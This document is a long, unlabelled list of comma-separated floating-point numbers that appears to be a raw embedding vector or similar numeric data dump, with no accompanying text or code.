-0.002578930463641882, -0.009942060336470604, -0.006662514992058277, -0.0008682621992193162, -0.017935743555426598, -0.0238876361399889, 0.0012469278881326318, -0.016974899917840958, 0.014492722228169441, 0.0010142236715182662, 0.0039701517671346664, 0.002538895234465599, 0.019670600071549416, 0.02879861369729042, -0.012797900475561619, 0.01808254048228264, -0.02474171854555607, 0.008761024102568626, 0.00625882763415575, -0.021832497790455818, 0.003960142843425274, -0.03176121413707733, -0.00619210209697485, -0.0134651530534029, 0.023754185065627098, 0.024474818259477615, -0.015133284032344818, -0.05289977043867111, -0.03053347021341324, 0.0033479388803243637, 0.0024571570102125406, 0.013044783845543861, -0.006772611755877733, 0.007026167586445808, 0.008260584436357021, 0.03330923989415169, 0.009715194813907146, 0.0066024623811244965, 0.012217391282320023, 0.026636715978384018, -0.04299774393439293, 0.0015346804866567254, -0.011503431014716625, -0.0498037189245224, 0.006519055925309658, -0.008847766555845737, -0.0027824423741549253, -0.0055548762902617455, 0.03048008866608143, -0.011810366995632648, 0.02185918763279915, -0.004864269867539406, 0.03472381457686424, 0.005408080760389566, -0.03672557324171066, -0.010916248895227909, 0.03373628109693527, 0.005758387967944145, 0.01909676380455494, 0.0026106250006705523, -0.012357514351606369, -0.0037466222420334816, 0.0192168690264225, 0.01242423988878727, -0.00693942466750741, -0.008887802250683308, 0.03851380944252014, 0.010802816599607468, -0.0514318123459816, -0.02203267440199852, 0.03168114274740219, 0.009748557582497597, -0.026076223701238632, -0.0005025244317948818, 0.04585358500480652, 0.03072029910981655, -0.04684111848473549, 0.0018933286191895604, 0.011803695000708103, -0.011810366995632648, -0.011950490064918995, 0.015533635392785072, 0.003916771616786718, -0.009261462837457657, 0.010902903974056244, -0.024488162249326706, 0.01382546965032816, -0.012097286060452461, -0.015039868652820587, -0.00619543856009841, -0.0010584291303530335, 0.012797900475561619, -0.008227221667766571, 0.015026523731648922, 0.02101845107972622, -0.042624082416296005, 0.005781741812825203, 0.037819866091012955, -0.002677350305020809, -0.006302198860794306, -0.004360494203865528, -0.0020417922642081976, 0.03942127153277397, 0.00003904469122062437, 0.01103635411709547, -0.005808432120829821, -0.017975779250264168, -0.008434070274233818, -0.04564006254076958, -0.0249018594622612, -0.007740127854049206, 0.014132405631244183, 0.011917127296328545, 0.004210362676531076, -0.022339610382914543, -0.008313965052366257, 0.028531711548566818, -0.014452686533331871, -0.027290623635053635, 0.028024600818753242, -0.02874523214995861, 0.004210362676531076, -0.029439175501465797, 0.033976491540670395, -0.02973276562988758, -0.013171561993658543, -0.028291501104831696, 0.0012043905444443226, -0.017708878964185715, -0.017802294343709946, 0.028131360188126564, 0.020791584625840187, 0.010749435983598232, 0.025235485285520554, 0.00287418975494802, 0.02885199338197708, -0.01529342494904995, 0.006579108536243439, -0.030853750184178352, -0.013558568432927132, -0.012837936170399189, 0.030293257907032967, -0.013618621043860912, -0.015053213573992252, -0.007019495125859976, 0.023367179557681084, -0.010789470747113228, -0.03154769167304039, 0.04339809715747833, -0.024541543796658516, -0.008887802250683308, -0.006792629137635231, -0.0037699760869145393, 0.001955049578100443, 0.013578586280345917, -0.02694365195930004, 0.014546101912856102, 0.00253055477514863, 0.03173452243208885, 0.003017648821696639, -0.010722746141254902, 0.027023721486330032, 0.006408959161490202, 0.02283337712287903, -0.003074365435168147, -0.007066202815622091, -0.012430911883711815, -0.04793541133403778, -0.009795265272259712, 0.023660769686102867, 0.001993416575714946, -0.03720599412918091, -0.00694609759375453, 0.0007798512233421206, 0.012257426045835018, 0.0037466222420334816, -0.01925690472126007, -0.004247061442583799, -0.026356469839811325, 0.013645311817526817, 0.0007919452036730945, 0.024594923481345177, -0.01834944076836109, -0.01151677593588829, 0.002100176876410842, -0.0024621612392365932, -0.026610026136040688, -0.0068993899039924145, -0.005001056473702192, -0.018576307222247124, -0.004727483261376619, -0.017028281465172768, -0.00861422810703516, -0.024328021332621574, 0.0033479388803243637, -0.004373839590698481, -0.008854439482092857, 0.017748912796378136, 0.0028675170615315437, -0.008667608723044395, 0.023420559242367744, 0.017935743555426598, -0.0073931566439569, 0.015493600629270077, -0.014452686533331871, 0.02205936424434185, 0.011296583339571953, -0.0239543616771698, -0.0027207215316593647, -0.006132049486041069, 0.017668843269348145, -0.014692897908389568, 0.021245315670967102, -0.04604041576385498, 0.021792463958263397, -0.02568921633064747, 0.0181359201669693, 0.018629686906933784, -0.012057250365614891, -0.02398105151951313, -0.016788071021437645, -0.007640040013939142, -0.010996319353580475, -0.0038333649281412363, -0.004470590967684984, 0.01477296743541956, 0.07499916851520538, 0.011596846394240856, 0.007199653424322605, 0.00523459492251277, -0.018482891842722893, 0.003326253267005086, 0.027464108541607857, 0.0001450231357011944, 0.008534157648682594, -0.0059418827295303345, 0.010309049859642982, -0.003816683776676655, 0.02665005996823311, -0.01107638981193304, -0.002220282331109047, -0.00263231061398983, 0.013665328733623028, -0.010742763057351112, 0.004634067881852388, 0.010662693530321121, -0.0033562795724719763, -0.004443901125341654, -0.002166902180761099, -0.015533635392785072, 0.004920986481010914, -0.010549260303378105, -0.018509581685066223, -0.01100966427475214, 0.009728539735078812, -0.0022436361759901047, 0.01433258131146431, -0.013718709349632263, -0.01347182597965002, -0.0182693712413311, 0.021418802440166473, 0.02203267440199852, 0.01708166114985943, -0.021445492282509804, 0.006075332872569561, -0.01809588447213173, -0.011710279621183872, 0.011837057769298553, -0.006242146249860525, 0.02861178293824196, 0.013545223511755466, -0.018429510295391083, -0.017815638333559036, 0.006262163631618023, 0.002367077860981226, 0.007052857894450426, -0.009675160050392151, -0.008787713944911957, -0.007973666302859783, 0.033095717430114746, -0.019336974248290062, 0.035978250205516815, 0.01626761257648468, -0.014279200695455074, -0.0021485527977347374, -0.0021502207964658737, -0.023687459528446198, 0.011857074685394764, 0.004006850533187389, 0.013812124729156494, -0.0003705335839185864, 0.00861422810703516, -0.00427708774805069, 0.009841972962021828, -0.015933986753225327, -0.005518177058547735, 0.022673236206173897, 0.010615985840559006, -0.022366300225257874, 0.006539073307067156, 0.007126255426555872, 0.03328254818916321, 0.009441621601581573, 0.0005037755472585559, 0.01094961166381836, -0.004363830666989088, 0.0016597902867943048, 0.0013486838433891535, -0.020831620320677757, -0.002980950055643916, 0.0009466643095947802, 0.030133116990327835, -0.026263054460287094, -0.012170683592557907, 0.02213943377137184, 0.0016973232850432396, 0.01642775349318981, 0.038593877106904984, 0.029252344742417336, 0.01625426858663559, 0.0017215111292898655, 0.018923277035355568, 0.015119939111173153, 0.0005121161811985075, -0.03982162103056908, -0.008814403787255287, -0.004223707597702742, -0.011063044890761375, 0.03242846578359604, 0.018376130610704422, -0.0030109763611108065, 0.006162075791507959, 0.006165412254631519, 0.024207916110754013, -0.007860233075916767, 0.015079904347658157, -0.030186498537659645, -0.009314843453466892, 0.014452686533331871, -0.009721867740154266, -0.009828628040850163, -0.003519756253808737, 0.02871854230761528, 0.014119060710072517, 0.02685023657977581, -0.0037699760869145393, -0.012697813101112843, -0.019870776683092117, 0.015159973874688148, -0.009935388341546059, 0.021592287346720695, 0.00253055477514863, -0.02217946946620941, -0.015720466151833534, 0.04537316411733627, 0.019510459154844284, -0.003137754276394844, -0.00868095364421606, -0.00013334621326066554, 0.0259828083217144, -0.0007627528975717723, -0.006642497610300779, 0.01642775349318981, 0.013525205664336681, -0.001634768326766789, -0.001344513613730669, -0.024247951805591583, 0.06005271524190903, -0.0182026457041502, 0.015640396624803543, 0.00020716102153528482, -0.007680074777454138, -0.01050255261361599, -0.0095750717446208, 0.02292679250240326, -0.006378932856023312, 0.01728183776140213, -0.010442500002682209, 0.028318190947175026, 0.024127846583724022, -0.013651983812451363, -0.0073931566439569, 0.01628095842897892, -0.0059752450324594975, 0.0025338910054415464, 0.00867428071796894, 0.019844086840748787, 0.01203723344951868, 0.013451808132231236, 0.027197208255529404, 0.014119060710072517, 0.021525561809539795, -0.013331702910363674, -0.03523092716932297, -0.03998176380991936, 0.0035297651775181293, 0.0037399495486170053, -0.00643564946949482, -0.0006672524032182992, 0.00960843451321125, -0.008040390908718109, 0.01389219518750906, -0.006832664366811514, -0.010575950145721436, 0.042650774121284485, -0.0031310818158090115, -0.017495358362793922, 0.024541543796658516, -0.013084819540381432, 0.0027073766104876995, -0.006709222681820393, -0.011616864241659641, -0.010389119386672974, 0.017722222954034805, -0.02374083921313286, -0.013024766929447651, -0.005998598877340555, 0.04243725165724754, -0.0005346359685063362, -0.012310806661844254, 0.01810923032462597, 0.01203723344951868, -0.003257859731093049, -0.003296226728707552, 0.003996841609477997, -0.011510103940963745, -0.01730852760374546, -0.02983952686190605, -0.012978059239685535, -0.001264443271793425, -0.003302899422124028, -0.017455322667956352, 0.004400529433041811, -0.01247761957347393, 0.006722567602992058, 0.001412072917446494, 0.005041091702878475, -0.0018299396615475416, 0.0035831453278660774, 0.0007089556893333793, 0.02286006696522236, -0.006145394407212734, -0.007092893123626709, -0.006629152689129114, 0.005431434605270624, -0.022166123613715172, 0.010696055367588997, 0.034083250910043716, -0.004617386497557163, -0.011209839954972267, 0.020311161875724792, -0.0014420992229133844, 0.012978059239685535, -0.017415286973118782, 0.032268326729536057, 0.01640106365084648, -0.014279200695455074, -0.003920107614248991, -0.0018949967343360186, -0.012337496504187584, -0.0119771808385849, 0.02119193598628044, 0.014479377306997776, 0.00762669462710619, -0.004413874354213476, -0.019737325608730316, -0.002025111112743616, 0.007112910505384207, -0.011450051330029964, -0.01628095842897892, -0.009168047457933426, -0.00027732676244340837, 0.011803695000708103, -0.017602117732167244, -0.014025645330548286, 0.001928359386511147, 0.009708521887660027, -0.013985609635710716, 0.006852682214230299, -0.012537672184407711, -0.007820198312401772, 0.002592275617644191, 0.0062254648655653, 0.024461472406983376, 0.026196328923106194, -0.01917683333158493, -0.0012460938887670636, -0.006405623164027929, 0.024701682850718498, 0.000047854508011369035, -0.010222306475043297, 0.01614750735461712, -0.017682189121842384, 0.0006559924804605544, 0.011543466709554195, 0.01614750735461712, 0.008714316412806511, 0.0171884223818779, 0.015213354490697384, -0.011636882089078426, -0.015159973874688148, 0.005398071836680174, 0.002327042631804943, -0.011923800222575665, 0.0015888947527855635, -0.013398427516222, -0.005531522445380688, 0.0190166924148798, 0.009741884656250477, -0.016681309789419174, 0.027997910976409912, -0.01828271523118019, -0.012524327263236046, -0.04112943634390831, -0.030853750184178352, 0.013585258275270462, -0.01726849190890789, 0.014759622514247894, 0.016054091975092888, -0.025342246517539024, -0.01925690472126007, 0.012324151583015919, -0.006472348235547543, 0.02396770566701889, -0.0014279200695455074, -0.006679196376353502, 0.018816517665982246, 0.00951501913368702, 0.008567520417273045, 0.012671123258769512, -0.026796855032444, 0.01387884933501482, -0.005121162161231041, -0.024755064398050308, -0.022473059594631195, 0.0053480276837944984, -0.00963512435555458, -0.003699914552271366, -0.004090256989002228, 0.015200009569525719, 0.007866906002163887, 0.01006216648966074, 0.004453909583389759, -0.0014929772587493062, 0.01634768396615982, -0.007433191407471895, -0.003020985284820199, -0.009148030541837215, 0.009795265272259712, -0.026316434144973755, 0.011703606694936752, -0.02027112804353237, -0.00205180118791759, -0.0010167257860302925, -0.010862869210541248, -0.01633433811366558, 0.0006297194631770253, 0.0028541721403598785, -0.007940303534269333, -0.02286006696522236, -0.010415810160338879, -0.018536271527409554, 0.007246361114084721, 0.014132405631244183, -0.0259828083217144, 0.026396503672003746, -0.05447448417544365, 0.012671123258769512, 0.0033462706487625837, 0.007713437546044588, 0.005541530903428793, 0.013538550585508347, -0.0023203701712191105, 0.015093249268829823, -0.004910977557301521, -0.008487449958920479, 0.00670588668435812, 0.004937667865306139, 0.012137320823967457, 0.007873577997088432, 0.0020568054169416428, 0.005124498158693314, -0.006071996875107288, 0.008454088121652603, 0.0050377557054162025, -0.017975779250264168, -0.026997031643986702, 0.007880250923335552, -0.019857430830597878, -0.00430711405351758, 0.002315365709364414, 0.0008261418552137911, 0.0020050934981554747, 0.008260584436357021, 0.005728361662477255, -0.010275687091052532, 0.00369657832197845, -0.019857430830597878, -0.000005844974566571182, 0.019563840702176094, -0.0010801148600876331, 0.005111153237521648, 0.017922399565577507, -0.004967694170773029, 0.007346448954194784, -0.00001947021701198537, -0.029172275215387344, -0.0324818454682827, 0.016921520233154297, 0.016908176243305206, -0.02882530353963375, 0.011356635950505733, 0.009501674212515354, 0.005341355223208666, -0.026263054460287094, 0.0023587371688336134, -0.005638282746076584, 0.005104480776935816, -0.003943461459130049, 0.02592942863702774, -0.03635191172361374, 0.042757533490657806, 0.04668097570538521, 0.005878493655472994, -0.027103792876005173, -0.0028791939839720726, 0.052232518792152405, -0.028051290661096573, -0.0052212500013411045, 0.00667586037889123, -0.008821076713502407, 0.00434381328523159, -0.007987011224031448, -0.012150665745139122, 0.012938023544847965, -0.0123842041939497, 0.024488162249326706, 0.013665328733623028, 0.012017215602099895, 0.004463918507099152, 0.004250397905707359, 0.002261985559016466, 0.022166123613715172, -0.010542587377130985, -0.021659012883901596, -0.010415810160338879, 0.007920285686850548, 0.03077368065714836, -0.0012302466202527285, -0.0029292379040271044, 0.007853561080992222, -0.008153824135661125, 0.004804217256605625, -0.006782620679587126, -0.0017048298614099622, -0.005828449502587318, 0.005758387967944145, -0.016107473522424698, 0.020591408014297485, -0.0020401242654770613, 0.014345926232635975, 0.014652862213551998, -0.02308693341910839, -0.028264811262488365, -0.012177356518805027, 0.006582444999366999, 0.01625426858663559, -0.009615106508135796, -0.004770854488015175, 0.011797022074460983, -0.0005329678533598781, -0.010262342169880867, -0.003367956494912505, -0.0011168137425556779, -0.01148341316729784, -0.01334504783153534, 0.03181459382176399, 0.01248429249972105, 0.015787191689014435, -0.000042302759538870305, -0.0007385649951174855, 0.006879372056573629, 0.0014345926465466619, 0.005961900111287832, 0.014385961927473545, 0.015747155994176865, -0.0054948232136666775, -0.0018416165839880705, 0.01387884933501482, -0.001661458401940763, -0.002990958746522665, 0.02109852060675621, 0.0024404756259173155, 0.016694655641913414, 0.015974022448062897, 0.0029709413647651672, 0.024648303166031837, 0.023513974621891975, -0.0007514929748140275, 0.010175598785281181, 0.011830384843051434, -0.004393856972455978, -0.019350320100784302, -0.005334682762622833, -0.00482089864090085, -0.009181393310427666, -0.00550816860049963, -0.009314843453466892, -0.007873577997088432, 0.013024766929447651, 0.004737492185086012, 0.034964025020599365, -0.0033996510319411755, -0.0007339776493608952, -0.016854794695973396, 0.020764894783496857, 0.01717507652938366, -0.004644076805561781, 0.010756108909845352, 0.030426708981394768, -0.002046796726062894, 0.010068838484585285, 0.0020584736485034227, 0.003749958472326398, 0.018789827823638916, -0.01378543395549059, -0.0295726265758276, -0.014999833889305592, 0.0006559924804605544, -0.00820720475167036, 0.011416688561439514, 0.019537150859832764, -0.021538907662034035, 0.026423195376992226, -0.0029309061355888844, -0.005047764163464308, 0.002111853798851371, 0.007473226636648178, 0.002588939154520631, 0.019857430830597878, -0.012531000189483166, -0.0030226532835513353, -0.0010050488635897636, 0.012544345110654831, -0.00005244186831987463, 0.008333981968462467, -0.017762258648872375, -0.0024905195459723473, -0.003259527962654829, -0.020804928615689278, -0.014732932671904564, 0.010322394780814648, -0.015240044333040714, -0.0017798957414925098, 0.004507289733737707, -0.0012043905444443226, -0.02314031310379505, 0.007459881715476513, -0.0024254624731838703, -0.01612081751227379, -0.021352076902985573, -0.017722222954034805, -0.003483057487756014, 0.0030526795890182257, 0.01010887324810028, -0.005341355223208666, -0.00138371461071074, -0.021405456587672234, 0.010142236016690731, 0.01337841060012579, -0.010716073215007782, -0.006058651488274336, 0.005251276306807995, -0.00909464992582798, 0.002170238411054015, -0.00619543856009841, -0.006725904066115618, -0.026596680283546448, 0.004567342810332775, 0.0016397727886214852, -0.030987201258540154, -0.011823711916804314, -0.008941181935369968, -0.016040747985243797, -0.03194804489612579, 0.0034897299483418465, -0.006819319445639849, 0.0018266034312546253, 0.018629686906933784, 0.004473927430808544, -0.0009675159817561507, 0.011249875649809837, -0.005484814755618572, -0.007960321381688118, -0.00816716905683279, -0.005674981512129307, 0.011623536236584187, 0.0016606244025751948, 0.016988245770335197, 0.018015814945101738, -0.002021774649620056, 0.0040602306835353374, -0.0017448649741709232, -0.015373495407402515, 0.03443022444844246, 0.008761024102568626, -0.002063478110358119, 0.014038990251719952, -0.01612081751227379, -0.002171906642615795, -0.0037566309329122305, -0.023687459528446198, 0.009788592346012592, 0.005588238593190908, -0.02962600626051426, -0.0036498706322163343, 0.01644109934568405, 0.016627930104732513, -0.00502774678170681, 0.000030886487365933135, -0.0037399495486170053, -0.029038824141025543, -0.01200387068092823, -0.005524849984794855, 0.0005483980639837682, 0.018509581685066223, 0.0021235307212918997, 0.008887802250683308, -0.0019383681938052177, 0.0041703274473547935, -0.008787713944911957, -0.003840037388727069, 0.01341177336871624, 0.009982096031308174, -0.02392766997218132, -0.009468311443924904, 0.0017465330893173814, -0.004487272351980209, -0.000020460669475141913, -0.0030560160521417856, 0.002650660229846835, -0.007906940765678883, -0.008727661333978176, -0.015787191689014435, -0.010575950145721436, 0.009408258832991123, 0.013038111850619316, -0.008667608723044395, 0.010489207692444324, -0.0038500463124364614, 0.021245315670967102, 0.005141179542988539, 0.015240044333040714, -0.028131360188126564, 0.005227922461926937, 0.004273751750588417, -0.01394557487219572, 0.0027874468360096216, 0.011376652866601944, -0.009288153611123562, -0.01633433811366558, 0.019550494849681854, 0.005034419242292643, -0.011470068246126175, -0.008387362584471703, 0.009821955114603043, 0.012711158022284508, 0.01708166114985943, -0.02187253348529339, -0.015280080027878284, -0.010369102470576763, 0.0062254648655653, 0.011923800222575665, 0.0033963145688176155, -0.0016114144818857312, 0.013571913354098797, 0.012611069716513157, 0.017642153427004814, 0.0009249786380678415, -0.003736613318324089, 0.008834421634674072, -0.022553130984306335, -0.002538895234465599, 0.00204846472479403, 0.019350320100784302, 0.006755930371582508, 0.020844964310526848, 0.015106594190001488, 0.008987889625132084, 0.0007206325535662472, 0.0036632155533879995, -0.012404222041368484, 0.018015814945101738, 0.024287987500429153, -0.007586659863591194, 0.02005760744214058, -0.012837936170399189, 0.015173319727182388, -0.0114367064088583, -0.0068393368273973465, -0.005271293688565493, -0.02403443120419979, -0.02187253348529339, 0.003232837887480855, 0.0037165957037359476, 0.014225821010768414, -0.008834421634674072, 0.02105848491191864, 0.02954593487083912, -0.015787191689014435, 0.0015572002157568932, 0.009708521887660027, 0.01808254048228264, 0.001290299347601831, 0.006378932856023312, -0.007026167586445808, 0.015466910786926746, 0.0004268330230843276, -0.01822933554649353, -0.006886044517159462, -0.005915192421525717, -0.03189466521143913, 0.0016155848279595375, -0.007459881715476513, -0.007960321381688118, 0.01628095842897892, -0.003034330205991864, 0.005828449502587318, 0.012437584809958935, 0.0003553119022399187, 0.026276398450136185, 0.011309928260743618, -0.002937578596174717, -0.0009116336004808545, -0.002889202907681465, 0.006245482247322798, 0.007766817696392536, 0.0012694476172327995, 0.009708521887660027, -0.017708878964185715, -0.004570678807795048, -0.018669722601771355, -0.02602284401655197, -0.006782620679587126, 0.020738204941153526, -0.00324618280865252, -0.024354713037610054, -0.009274807758629322, -0.0020117659587413073, 0.014199131168425083, -0.003312908113002777, -0.009535036981105804, -0.004700792953372002, -0.018643030896782875, -0.0018149265088140965, 0.010822833515703678, 0.028291501104831696, 0.016107473522424698, 0.019590530544519424, 0.0071729631163179874, -0.000019444150893832557, -0.0007356457645073533, 0.0062154559418559074, -0.008287274278700352, -0.015947332605719566, 0.0061787571758031845, 0.015333459712564945, 0.014706242829561234, 0.004914314020425081, 0.0065090470016002655, -0.005157860927283764, 0.011289910413324833, -0.002006761496886611, -0.0012694476172327995, -0.010522570461034775, 0.004493944812566042, 0.004844252485781908, 0.008867784403264523, 0.0014871387975290418, -0.000046368826588150114, 0.006635825149714947, 0.01442599669098854, -0.010002112947404385, 0.025115380063652992, -0.007486572023481131, 0.0033596158027648926, 0.0018182627391070127, 0.004090256989002228, -0.002859176602214575, 0.006202111020684242, 0.0034129959531128407, -0.013191579841077328, -0.00643231300637126, -0.020404577255249023, 0.016494479030370712, -0.0012093950062990189, 0.0027057083789259195, -0.006332225166261196, 0.011743642389774323, -0.0005842628888785839, -0.0095750717446208, -0.004610714036971331, 0.013064801692962646, -0.008787713944911957, 0.0025872711557894945, 0.0061754207126796246, 0.015640396624803543, 0.005511504597961903, -0.006245482247322798, 0.002236963715404272, 0.029972977936267853, -0.013838814571499825, -0.02882530353963375, -0.009074632078409195, 0.00004540443842415698, -0.015947332605719566, -0.013551896438002586, 0.007606677245348692, -0.02109852060675621, -0.00902792438864708, -0.009194738231599331, 0.022246195003390312, -0.027103792876005173, -0.001143503817729652, 0.014132405631244183, -0.02391432598233223, 0.012624415569007397, -0.03056016005575657, 0.00999544095247984, -0.001663126633502543, 0.011309928260743618, 0.01095628459006548, -0.0007539952057413757, 0.015653740614652634, 0.006152066867798567, -0.005104480776935816, 0.01340510044246912, -0.003723268397152424, -0.018549615517258644, -0.0026389833074063063, -0.030319947749376297, -0.0028675170615315437, -0.007853561080992222, 0.013204924762248993, 0.034190014004707336, 0.0013269982300698757, 0.0071729631163179874, -0.0017465330893173814, -0.008961199782788754, -0.002964268671348691, -0.007913613691926003, -0.0002804545219987631, 0.008954526856541634, -0.0016606244025751948, -0.003151099430397153, -0.0024688339326530695, -0.007059530355036259, 0.01197050791233778, -0.031093960627913475, 0.0026556644588708878, -0.023820910602808, -0.027490798383951187, -0.020644789561629295, -0.01924355886876583, 0.006188766099512577, 0.012817918322980404, -0.025075344368815422, -0.007880250923335552, 0.013625293970108032, -0.011376652866601944, 0.014452686533331871, -0.00012521407916210592, 0.007413174025714397, 0.0257826317101717, -0.0091013228520751, -0.025395626202225685, 0.008761024102568626, 0.010195616632699966, 0.00369657832197845, 0.02121862582862377, 0.009755229577422142, -0.004844252485781908, -0.001036743400618434, -0.020604753866791725, -0.003429677337408066, 0.00249719200655818, 0.01625426858663559, 0.014105715788900852, 0.010736091062426567, 0.0028274820651859045, -0.01107638981193304, -0.019430389627814293, 0.003161108121275902, -0.01625426858663559, -0.00043454812839627266, -0.0006505710771307349, -0.029359105974435806, -0.0052579487673938274, 0.01248429249972105, -0.011349963024258614, 0.012317478656768799, -0.0018699747743085027, 0.001809922163374722, -0.00458068773150444, -0.04435893893241882, 0.001169359777122736, 0.010175598785281181, 0.011990525759756565, 0.004530643578618765, -0.0018015814712271094, -0.01733521744608879, -0.012657777406275272, -0.0011076389346271753, 0.008180513978004456, -0.006822655908763409, -0.04291767254471779, 0.0033829696476459503, -0.007926958613097668, -0.010235651396214962, 0.03531099483370781, 0.008727661333978176, -0.011610191315412521, -0.0020434604957699776, 0.003296226728707552, 0.006275508552789688, 0.004400529433041811, 0.01477296743541956, 0.008340654894709587, -0.006819319445639849, 0.004450573585927486, 0.00012146078370278701, 0.022579820826649666, 0.000998376403003931, 0.0006038633873686194, -0.027384037151932716, 0.005638282746076584, -0.009314843453466892, 0.029225654900074005, -0.019430389627814293, -0.006682532839477062, 0.006892716977745295, 0.005084463395178318, -0.025569111108779907, 0.010736091062426567, -0.047321539372205734, 0.024328021332621574, 0.008273929357528687, 0.002165233949199319, 0.011610191315412521, 0.007253033574670553, -0.0028258138336241245, -0.006739248987287283, 0.013798779807984829, -0.0032011433504521847, -0.01721511222422123, 0.0007644210127182305, 0.0041169472970068455, 0.0028408269863575697, 0.014519412070512772, 0.007966993376612663, -0.014933108352124691, -0.023153657093644142, -0.0010817829752340913, 0.00252888654358685, -0.018963312730193138, -0.005364709068089724, -0.012564362026751041, -0.013718709349632263, -0.0016472793649882078, -0.00667586037889123, 0.00010467521497048438, -0.0012402554275467992, -0.006298862397670746, 0.0002287424576934427, 0.01197050791233778, -0.005688326433300972, 0.010362429544329643, 0.03229501470923424, -0.01821598969399929, -0.009935388341546059, -0.004016859456896782, -0.009721867740154266, -0.033843040466308594, -0.0033596158027648926, 0.019710635766386986, -0.006075332872569561, -0.019443735480308533, -0.024328021332621574, 0.015173319727182388, 0.004764182027429342, -0.002315365709364414, -0.03563127666711807, -0.02380756475031376, 0.013318357989192009, 0.004854260943830013, 0.0030276577454060316, -0.019697289913892746, 0.00037157617043703794, 0.023674115538597107, 0.006058651488274336, 0.0062154559418559074, 0.018923277035355568, -0.026369813829660416, -0.01155681163072586, -0.019323628395795822, -0.002263653790578246, -0.00502441031858325, 0.0012702817330136895, -0.030133116990327835, -0.019697289913892746, 0.01911010779440403, -0.015106594190001488, -0.010669365525245667, -0.00202010665088892, 0.021632323041558266, 0.004273751750588417, 0.02112521044909954, -0.007199653424322605, 0.023447249084711075, -0.0032828818075358868, -0.0011618532007560134, -0.0015355146024376154, 0.009087977930903435, 0.03699247166514397, 0.005738370586186647, -0.0015980694442987442, -0.005421425681561232, -0.020484648644924164, -0.006402286700904369, 0.017989125102758408, 0.02300686202943325, -0.005197896156460047, -0.005434770602732897, -0.00045581680024042726, 0.006519055925309658, 0.0014145750319585204, -0.018442856147885323, 0.014279200695455074, -0.013211597688496113, -0.01720176637172699, 0.01809588447213173, 0.007259706035256386, -0.020604753866791725, -0.014452686533331871, -0.02105848491191864, -0.01834944076836109, 0.00451396219432354, -0.0011059708194807172, -0.02099175937473774, -0.026196328923106194, -0.01387884933501482, -0.0043538217432796955, -0.002779106143862009, 0.006846009287983179, 0.00691273482516408, 0.005588238593190908, 0.011990525759756565, -0.02572925202548504, 0.020564718171954155, 0.017588773742318153, 0.014412651769816875, 0.0033162443432956934, 0.01825602538883686, 0.0007735957624390721, 0.028104670345783234, -0.003629853017628193, -0.004407201893627644, 0.004187008831650019, -0.0305868498980999, -0.0027891150675714016, -0.007326431106775999, -0.0031627763528376818, 0.007459881715476513, 0.009341533295810223, -0.007259706035256386, 0.003099387278780341, -0.012317478656768799, 0.013138199225068092, -0.01740194298326969, -0.012123975902795792, -0.005124498158693314, -0.014506067149341106, -0.01737525314092636, 0.02197929285466671, -0.020871654152870178, 0.01056927815079689, -0.012524327263236046, 0.0026106250006705523, 0.002685690764337778, 0.003916771616786718, 0.01816261000931263, 0.002660668920725584, -0.016881484538316727, -0.016934866085648537, 0.005304656457155943, 0.02019105665385723, 0.013905540108680725, 0.027544178068637848, -0.019830740988254547, 0.010275687091052532, 0.020457958802580833, -0.007960321381688118, -0.007600004784762859, -0.006829328369349241, 0.021418802440166473, -0.018763137981295586, -0.020724859088659286, 0.007039512507617474, 0.007940303534269333, 0.00369657832197845, 0.027090447023510933, 0.012097286060452461, 0.01630764827132225, -0.003846710082143545, 0.021432146430015564, 0.02392766997218132, -0.00956839881837368, -0.0014821343356743455, -0.013098164461553097, -0.017975779250264168, -0.0006493199616670609, -0.016067437827587128, -0.010742763057351112, 0.006642497610300779, -0.01008885633200407, -0.0016773056704550982, 0.022673236206173897, -0.009381568990647793, 0.014919763430953026, -0.0007656721281819046, 0.019350320100784302, 0.01913679763674736, -0.0011093070497736335, 0.0019984208047389984, 0.010228979401290417, 0.002835822757333517, -0.00550816860049963, -0.013365065678954124, -0.0027207215316593647, 0.009168047457933426, -0.011690261773765087, -0.012210718356072903, 0.0034530311822891235, 0.011083061806857586, -0.00499772047623992, -0.01046918984502554, 0.025609146803617477, -0.013958919793367386, 0.013678673654794693, -0.02400774136185646, -0.0019633902702480555, 0.0032261651940643787, -0.005307992920279503, -0.006679196376353502, -0.0008574193343520164, -0.025435661897063255, -0.016494479030370712, 0.011470068246126175, 0.010489207692444324, 0.004210362676531076, 0.004430555738508701, -0.01152344886213541, -0.013498515821993351, -0.015226699411869049, -0.014185786247253418, 0.013024766929447651, -0.006402286700904369, -0.003469712333753705, 0.010629330761730671, -0.02778439037501812, -0.0037065870128571987, -0.014732932671904564, 0.0036899056285619736, -0.01625426858663559, -0.011636882089078426, -0.016828104853630066, -0.0239543616771698, 0.0038100110832601786, 0.0028541721403598785, -0.009681832045316696, 0.011196495033800602, 0.024314677342772484, 0.011203167960047722, 0.019790705293416977, 0.020311161875724792, 0.020604753866791725, 0.0009416599059477448, -0.012831263244152069, 0.003459703642874956, 0.0016147508285939693, -0.023527318611741066, -0.024474818259477615, 0.0025655855424702168, 0.0008069583564065397, -0.007880250923335552, -0.000016759502614149824, 0.009314843453466892, 0.004210362676531076, 0.014372616074979305, 0.016094127669930458, 0.011543466709554195, 0.02193925902247429, 0.02113855630159378, 0.0042604063637554646, -0.0124509297311306, -0.01808254048228264, 0.015840571373701096, -0.0190166924148798, -0.008774369023740292, 0.004143637139350176, -0.014159095473587513, 0.006832664366811514, 0.0180691946297884, 0.006282181013375521, 0.014372616074979305, 0.004584023728966713, -0.000637643039226532, 0.026463229209184647, -0.0005358870839700103, 0.016614584252238274, -0.0021869197953492403, -0.009281480684876442, -0.001849957276135683, -0.004941003862768412, 0.008540830574929714, 0.021538907662034035, 0.025128724053502083, 0.0039701517671346664, -0.01101633720099926, -0.0013203256530687213, -0.0018165946239605546, -0.008807731792330742, -0.01836278662085533, -0.004574015270918608, -0.008253912441432476, -0.02502196468412876, 0.002377086551859975, 0.009394913911819458, -0.021845843642950058, 0.024127846583724022, -0.013064801692962646, 0.004637403879314661, 0.01529342494904995, 0.009188065305352211, 0.020511338487267494, 0.005968572571873665, -0.0021835833322256804, -0.00817384198307991, 0.012137320823967457, 0.0035564552526921034, 0.007473226636648178, 0.004967694170773029, -0.010989646427333355, 0.023634079843759537, -0.008714316412806511, 0.013692018575966358, -0.01924355886876583, -0.02775769867002964, 0.022793341428041458, 0.005334682762622833, -0.006285517476499081, -0.015159973874688148, -0.009201410226523876, 0.007813525386154652, 0.013318357989192009, 0.0015680431388318539, -0.011530120857059956, 0.0033579475712031126, 0.01925690472126007, -0.005761724431067705, 0.007726782467216253, 0.016801415011286736, 0.0005283805076032877, 0.005034419242292643, 0.018509581685066223, 